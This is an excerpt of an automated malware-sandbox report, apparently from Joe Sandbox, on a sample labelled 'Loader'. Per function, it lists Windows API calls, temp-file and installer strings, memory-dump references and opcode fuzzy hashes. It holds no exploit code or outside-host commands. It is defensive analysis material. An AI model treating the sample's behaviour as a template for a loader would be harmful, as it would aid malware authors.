                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: ccebd128bbe4e9bb6111c0dafa4c3d4753fa9787b5105a835a2bc2114a3fe238
                                                                                                                                                                                                                                                                                                                • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ccebd128bbe4e9bb6111c0dafa4c3d4753fa9787b5105a835a2bc2114a3fe238
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                                                                Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                                                • String ID: Version
                                                                                                                                                                                                                                                                                                                • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                                                • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                                                • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                                                                Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                                                • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                                                                Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                                • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                                                                Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                                                • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                                                • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                                • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                                                                Function 00402C8A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36filestringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00000000,00000011), ref: 00402CAA
                                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll,00000000,?,?,00000000,00000011), ref: 00402CCC
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll, xrefs: 00402C97, 00402CC0
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: FileWritelstrlen
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll
                                                                                                                                                                                                                                                                                                                • API String ID: 427699356-3145118107
                                                                                                                                                                                                                                                                                                                • Opcode ID: 55486fcf8e651e727bb483dec04ca9597feabbd23016b763e615125cc29686d5
                                                                                                                                                                                                                                                                                                                • Instruction ID: c506515b4f3882524b3727819370815232dade3b70b13ac55afc9f5c9595d706
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55486fcf8e651e727bb483dec04ca9597feabbd23016b763e615125cc29686d5
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FF08972644201EBDB14EFB1DD45AEF7668DB00309B10843FF103F20D2D67D8A81966D
                                                                                                                                                                                                                                                                                                                Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: HideWindow
                                                                                                                                                                                                                                                                                                                • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                                                • Opcode ID: be3f33bca0c5f1204a4a496ffc1b00969947ff7659ffa90b0b167d1f8fab4121
                                                                                                                                                                                                                                                                                                                • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be3f33bca0c5f1204a4a496ffc1b00969947ff7659ffa90b0b167d1f8fab4121
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                                                                Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                                                • String ID: !N~
                                                                                                                                                                                                                                                                                                                • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                                                • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                                • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                                                                Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                                • String ID: Error launching installer
                                                                                                                                                                                                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                                                • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                                • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                                                                Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"), xrefs: 004062D1, 004062D6
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\")
                                                                                                                                                                                                                                                                                                                • API String ID: 3509786178-1912999109
                                                                                                                                                                                                                                                                                                                • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                                • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
